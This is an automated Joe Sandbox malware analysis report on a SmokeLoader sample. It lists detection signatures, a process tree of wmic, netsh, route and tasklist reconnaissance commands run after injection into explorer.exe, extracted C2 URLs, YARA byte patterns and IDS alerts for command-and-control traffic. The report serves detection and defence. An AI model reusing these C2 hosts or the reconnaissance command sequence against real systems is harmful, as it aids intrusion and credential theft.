Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
9VgIkx4su0.exe

Overview

General Information

Sample name:9VgIkx4su0.exe
renamed because original name is a hash value
Original sample name:5d99d66ef42ec43af05b9304aebefdb6.exe
Analysis ID:1525244
MD5:5d99d66ef42ec43af05b9304aebefdb6
SHA1:b90f71e96df4a0d654aaab1fdfe2845c8dcb8032
SHA256:4942ff94e613e09ebaada37b5d61a9b08459fcef987303c8dce1fd10868825ac
Tags:exeStealcuser-abuse_ch
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the windows firewall
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ipconfig to lookup or modify the Windows network settings
Uses netsh to modify the Windows network and firewall settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • 9VgIkx4su0.exe (PID: 5556 cmdline: "C:\Users\user\Desktop\9VgIkx4su0.exe" MD5: 5D99D66EF42EC43AF05B9304AEBEFDB6)
    • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • 3E40.exe (PID: 5572 cmdline: C:\Users\user\AppData\Local\Temp\3E40.exe MD5: 119C907F0839351B214BD51034B6F124)
      • FDDB.exe (PID: 3720 cmdline: C:\Users\user\AppData\Local\Temp\FDDB.exe MD5: 69C7186C5393D5E94294E39DA1D4D830)
        • cmd.exe (PID: 3624 cmdline: cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 2272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WMIC.exe (PID: 2164 cmdline: wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 3552 cmdline: wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 5236 cmdline: wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 4456 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 6572 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 6844 cmdline: wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 5444 cmdline: wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 6100 cmdline: wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 1852 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 2792 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 1476 cmdline: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 3396 cmdline: wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 7072 cmdline: wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 5572 cmdline: wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • ipconfig.exe (PID: 932 cmdline: ipconfig /displaydns MD5: 62F170FB07FDBB79CEB7147101406EB8)
          • ROUTE.EXE (PID: 6492 cmdline: route print MD5: 3C97E63423E527BA8381E81CBA00B8CD)
          • netsh.exe (PID: 5776 cmdline: netsh firewall show state MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
          • systeminfo.exe (PID: 2652 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
          • tasklist.exe (PID: 7144 cmdline: tasklist /v /fo csv MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • explorer.exe (PID: 6580 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 6824 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
      • explorer.exe (PID: 2180 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 4444 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
      • explorer.exe (PID: 3944 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 1976 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • eihchav (PID: 7060 cmdline: C:\Users\user\AppData\Roaming\eihchav MD5: 5D99D66EF42EC43AF05B9304AEBEFDB6)
  • dghchav (PID: 4284 cmdline: C:\Users\user\AppData\Roaming\dghchav MD5: 119C907F0839351B214BD51034B6F124)
  • msiexec.exe (PID: 1480 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
  • dghchav (PID: 4036 cmdline: C:\Users\user\AppData\Roaming\dghchav MD5: 119C907F0839351B214BD51034B6F124)
  • eihchav (PID: 6300 cmdline: C:\Users\user\AppData\Roaming\eihchav MD5: 5D99D66EF42EC43AF05B9304AEBEFDB6)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}
SourceRuleDescriptionAuthorStrings
00000006.00000003.2684210393.0000000000600000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000000.00000002.2114850031.0000000002370000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000000.00000002.2114850031.0000000002370000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      00000006.00000002.2735276469.0000000000600000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        00000006.00000002.2735276469.0000000000600000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
        • 0x5e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
        Click to see the 25 entries
        SourceRuleDescriptionAuthorStrings
        6.2.3E40.exe.560e67.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          7.2.dghchav.5e0e67.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            7.3.dghchav.5f0000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              6.2.3E40.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                6.3.3E40.exe.600000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                  Click to see the 1 entries

                  System Summary

                  barindex
                  Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\wbem\WMIC.exe, SourceProcessId: 5572, StartAddress: C76632B0, TargetImage: C:\Users\user\AppData\Local\Temp\3E40.exe, TargetProcessId: 5572
                  Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\eihchav, CommandLine: C:\Users\user\AppData\Roaming\eihchav, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\eihchav, NewProcessName: C:\Users\user\AppData\Roaming\eihchav, OriginalFileName: C:\Users\user\AppData\Roaming\eihchav, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\user\AppData\Roaming\eihchav, ProcessId: 7060, ProcessName: eihchav
                  Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , CommandLine: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3624, ParentProcessName: cmd.exe, ProcessCommandLine: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , ProcessId: 1476, ProcessName: WMIC.exe
                  Source: Process startedAuthor: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: route print, CommandLine: route print, CommandLine|base64offset|contains: , Image: C:\Windows\System32\ROUTE.EXE, NewProcessName: C:\Windows\System32\ROUTE.EXE, OriginalFileName: C:\Windows\System32\ROUTE.EXE, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3624, ParentProcessName: cmd.exe, ProcessCommandLine: route print, ProcessId: 6492, ProcessName: ROUTE.EXE
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-03T23:27:26.351046+020020391031A Network Trojan was detected192.168.2.549755190.224.203.3780TCP
                  2024-10-03T23:27:27.758377+020020391031A Network Trojan was detected192.168.2.549765190.224.203.3780TCP
                  2024-10-03T23:27:29.194284+020020391031A Network Trojan was detected192.168.2.549776190.224.203.3780TCP
                  2024-10-03T23:27:30.544106+020020391031A Network Trojan was detected192.168.2.549787190.224.203.3780TCP
                  2024-10-03T23:27:31.904800+020020391031A Network Trojan was detected192.168.2.549798190.224.203.3780TCP
                  2024-10-03T23:27:33.286503+020020391031A Network Trojan was detected192.168.2.549807190.224.203.3780TCP
                  2024-10-03T23:27:34.676196+020020391031A Network Trojan was detected192.168.2.549815190.224.203.3780TCP
                  2024-10-03T23:27:36.198420+020020391031A Network Trojan was detected192.168.2.549826190.224.203.3780TCP
                  2024-10-03T23:27:37.768833+020020391031A Network Trojan was detected192.168.2.549836190.224.203.3780TCP
                  2024-10-03T23:27:39.169274+020020391031A Network Trojan was detected192.168.2.549847190.224.203.3780TCP
                  2024-10-03T23:27:40.555439+020020391031A Network Trojan was detected192.168.2.549857190.224.203.3780TCP
                  2024-10-03T23:27:42.030471+020020391031A Network Trojan was detected192.168.2.549866190.224.203.3780TCP
                  2024-10-03T23:27:43.407680+020020391031A Network Trojan was detected192.168.2.549875190.224.203.3780TCP
                  2024-10-03T23:27:44.841740+020020391031A Network Trojan was detected192.168.2.549886190.224.203.3780TCP
                  2024-10-03T23:27:46.506715+020020391031A Network Trojan was detected192.168.2.549896190.224.203.3780TCP
                  2024-10-03T23:27:47.946560+020020391031A Network Trojan was detected192.168.2.549905190.224.203.3780TCP
                  2024-10-03T23:27:49.341855+020020391031A Network Trojan was detected192.168.2.549915190.224.203.3780TCP
                  2024-10-03T23:27:50.755886+020020391031A Network Trojan was detected192.168.2.549925190.224.203.3780TCP
                  2024-10-03T23:27:52.931239+020020391031A Network Trojan was detected192.168.2.549933190.224.203.3780TCP
                  2024-10-03T23:27:54.628396+020020391031A Network Trojan was detected192.168.2.549943190.224.203.3780TCP
                  2024-10-03T23:27:56.024081+020020391031A Network Trojan was detected192.168.2.549955190.224.203.3780TCP
                  2024-10-03T23:27:57.416962+020020391031A Network Trojan was detected192.168.2.549962190.224.203.3780TCP
                  2024-10-03T23:27:58.838657+020020391031A Network Trojan was detected192.168.2.549973190.224.203.3780TCP
                  2024-10-03T23:28:00.557599+020020391031A Network Trojan was detected192.168.2.549983190.224.203.3780TCP
                  2024-10-03T23:28:01.964076+020020391031A Network Trojan was detected192.168.2.549995190.224.203.3780TCP
                  2024-10-03T23:28:04.724708+020020391031A Network Trojan was detected192.168.2.550001190.224.203.3780TCP
                  2024-10-03T23:28:06.106668+020020391031A Network Trojan was detected192.168.2.550002190.224.203.3780TCP
                  2024-10-03T23:28:07.783475+020020391031A Network Trojan was detected192.168.2.550003190.224.203.3780TCP
                  2024-10-03T23:28:27.492822+020020391031A Network Trojan was detected192.168.2.55000423.145.40.162443TCP
                  2024-10-03T23:28:28.827338+020020391031A Network Trojan was detected192.168.2.55000523.145.40.162443TCP
                  2024-10-03T23:28:29.698649+020020391031A Network Trojan was detected192.168.2.55000623.145.40.162443TCP
                  2024-10-03T23:28:30.593972+020020391031A Network Trojan was detected192.168.2.55000723.145.40.162443TCP
                  2024-10-03T23:28:31.491717+020020391031A Network Trojan was detected192.168.2.55000823.145.40.162443TCP
                  2024-10-03T23:28:32.397820+020020391031A Network Trojan was detected192.168.2.55000923.145.40.162443TCP
                  2024-10-03T23:28:33.281763+020020391031A Network Trojan was detected192.168.2.55001023.145.40.162443TCP
                  2024-10-03T23:28:34.158137+020020391031A Network Trojan was detected192.168.2.55001123.145.40.162443TCP
                  2024-10-03T23:28:35.523365+020020391031A Network Trojan was detected192.168.2.55001223.145.40.162443TCP
                  2024-10-03T23:28:36.427500+020020391031A Network Trojan was detected192.168.2.55001323.145.40.162443TCP
                  2024-10-03T23:28:37.346496+020020391031A Network Trojan was detected192.168.2.55001423.145.40.162443TCP
                  2024-10-03T23:28:38.252554+020020391031A Network Trojan was detected192.168.2.55001523.145.40.162443TCP
                  2024-10-03T23:28:39.245617+020020391031A Network Trojan was detected192.168.2.55001623.145.40.162443TCP
                  2024-10-03T23:28:40.510134+020020391031A Network Trojan was detected192.168.2.55001723.145.40.162443TCP
                  2024-10-03T23:28:41.706436+020020391031A Network Trojan was detected192.168.2.55001823.145.40.162443TCP
                  2024-10-03T23:28:42.669103+020020391031A Network Trojan was detected192.168.2.55001923.145.40.162443TCP
                  2024-10-03T23:28:43.577729+020020391031A Network Trojan was detected192.168.2.55002023.145.40.162443TCP
                  2024-10-03T23:28:49.975552+020020391031A Network Trojan was detected192.168.2.55002123.145.40.162443TCP
                  2024-10-03T23:29:17.365927+020020391031A Network Trojan was detected192.168.2.550022190.224.203.3780TCP
                  2024-10-03T23:29:23.862679+020020391031A Network Trojan was detected192.168.2.550023190.224.203.3780TCP
                  2024-10-03T23:29:32.216730+020020391031A Network Trojan was detected192.168.2.550024190.224.203.3780TCP
                  2024-10-03T23:29:43.489724+020020391031A Network Trojan was detected192.168.2.550025190.224.203.3780TCP
                  2024-10-03T23:29:54.425367+020020391031A Network Trojan was detected192.168.2.550026190.224.203.3780TCP
                  2024-10-03T23:30:05.329427+020020391031A Network Trojan was detected192.168.2.55002723.145.40.162443TCP
                  2024-10-03T23:30:12.051514+020020391031A Network Trojan was detected192.168.2.550028187.131.253.16980TCP
                  2024-10-03T23:30:24.977476+020020391031A Network Trojan was detected192.168.2.55002923.145.40.162443TCP
                  2024-10-03T23:30:33.007547+020020391031A Network Trojan was detected192.168.2.550030187.131.253.16980TCP
                  2024-10-03T23:30:36.790275+020020391031A Network Trojan was detected192.168.2.55003123.145.40.162443TCP
                  2024-10-03T23:30:45.768674+020020391031A Network Trojan was detected192.168.2.550032187.131.253.16980TCP
                  2024-10-03T23:30:55.983251+020020391031A Network Trojan was detected192.168.2.55003323.145.40.162443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-03T23:28:27.815568+020028098821Malware Command and Control Activity Detected192.168.2.55000423.145.40.162443TCP
                  2024-10-03T23:28:29.109018+020028098821Malware Command and Control Activity Detected192.168.2.55000523.145.40.162443TCP
                  2024-10-03T23:28:29.972457+020028098821Malware Command and Control Activity Detected192.168.2.55000623.145.40.162443TCP
                  2024-10-03T23:28:30.878819+020028098821Malware Command and Control Activity Detected192.168.2.55000723.145.40.162443TCP
                  2024-10-03T23:28:31.769891+020028098821Malware Command and Control Activity Detected192.168.2.55000823.145.40.162443TCP
                  2024-10-03T23:28:32.676674+020028098821Malware Command and Control Activity Detected192.168.2.55000923.145.40.162443TCP
                  2024-10-03T23:28:33.562551+020028098821Malware Command and Control Activity Detected192.168.2.55001023.145.40.162443TCP
                  2024-10-03T23:28:34.427119+020028098821Malware Command and Control Activity Detected192.168.2.55001123.145.40.162443TCP
                  2024-10-03T23:28:35.807317+020028098821Malware Command and Control Activity Detected192.168.2.55001223.145.40.162443TCP
                  2024-10-03T23:28:36.718130+020028098821Malware Command and Control Activity Detected192.168.2.55001323.145.40.162443TCP
                  2024-10-03T23:28:37.626997+020028098821Malware Command and Control Activity Detected192.168.2.55001423.145.40.162443TCP
                  2024-10-03T23:28:38.530680+020028098821Malware Command and Control Activity Detected192.168.2.55001523.145.40.162443TCP
                  2024-10-03T23:28:39.534129+020028098821Malware Command and Control Activity Detected192.168.2.55001623.145.40.162443TCP
                  2024-10-03T23:28:40.782266+020028098821Malware Command and Control Activity Detected192.168.2.55001723.145.40.162443TCP
                  2024-10-03T23:28:41.984717+020028098821Malware Command and Control Activity Detected192.168.2.55001823.145.40.162443TCP
                  2024-10-03T23:28:42.951800+020028098821Malware Command and Control Activity Detected192.168.2.55001923.145.40.162443TCP
                  2024-10-03T23:28:43.941251+020028098821Malware Command and Control Activity Detected192.168.2.55002023.145.40.162443TCP
                  2024-10-03T23:28:50.255577+020028098821Malware Command and Control Activity Detected192.168.2.55002123.145.40.162443TCP
                  2024-10-03T23:30:05.677019+020028098821Malware Command and Control Activity Detected192.168.2.55002723.145.40.162443TCP
                  2024-10-03T23:30:25.257975+020028098821Malware Command and Control Activity Detected192.168.2.55002923.145.40.162443TCP
                  2024-10-03T23:30:37.074358+020028098821Malware Command and Control Activity Detected192.168.2.55003123.145.40.162443TCP
                  2024-10-03T23:30:56.286836+020028098821Malware Command and Control Activity Detected192.168.2.55003323.145.40.162443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-03T23:28:27.911603+020028298482Potentially Bad Traffic23.145.40.162443192.168.2.550004TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: 9VgIkx4su0.exeAvira: detected
                  Source: C:\Users\user\AppData\Roaming\dghchavAvira: detection malicious, Label: HEUR/AGEN.1310247
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeAvira: detection malicious, Label: HEUR/AGEN.1310247
                  Source: C:\Users\user\AppData\Roaming\eihchavAvira: detection malicious, Label: HEUR/AGEN.1310247
                  Source: 00000000.00000002.2114850031.0000000002370000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeReversingLabs: Detection: 55%
                  Source: C:\Users\user\AppData\Roaming\eihchavReversingLabs: Detection: 34%
                  Source: 9VgIkx4su0.exeReversingLabs: Detection: 34%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Users\user\AppData\Roaming\dghchavJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\eihchavJoe Sandbox ML: detected
                  Source: 9VgIkx4su0.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeCode function: 8_2_00007FF6DFE236F0 CryptExportKey,CryptExportKey,8_2_00007FF6DFE236F0
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeCode function: 8_2_00007FF6DFE23220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx,8_2_00007FF6DFE23220
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_006E3098 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,10_2_006E3098
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_006E3717 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,10_2_006E3717
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_006E3E04 RtlCompareMemory,CryptUnprotectData,10_2_006E3E04
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_006E11E1 lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,10_2_006E11E1
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_006E1198 CryptBinaryToStringA,CryptBinaryToStringA,10_2_006E1198
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_006E123B lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,10_2_006E123B
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_006E1FCE CryptUnprotectData,RtlMoveMemory,10_2_006E1FCE
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 15_2_0019245E lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,15_2_0019245E
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 15_2_00192404 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,15_2_00192404
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 15_2_0019263E CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,15_2_0019263E
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_02FE25A4 CryptBinaryToStringA,CryptBinaryToStringA,18_2_02FE25A4
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_02FE2799 CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,18_2_02FE2799
                  Source: 9VgIkx4su0.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.5:50000 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50004 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50005 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50006 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50007 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50008 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50009 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50010 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50011 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50012 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50013 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50014 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50015 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50016 version: TLS 1.2
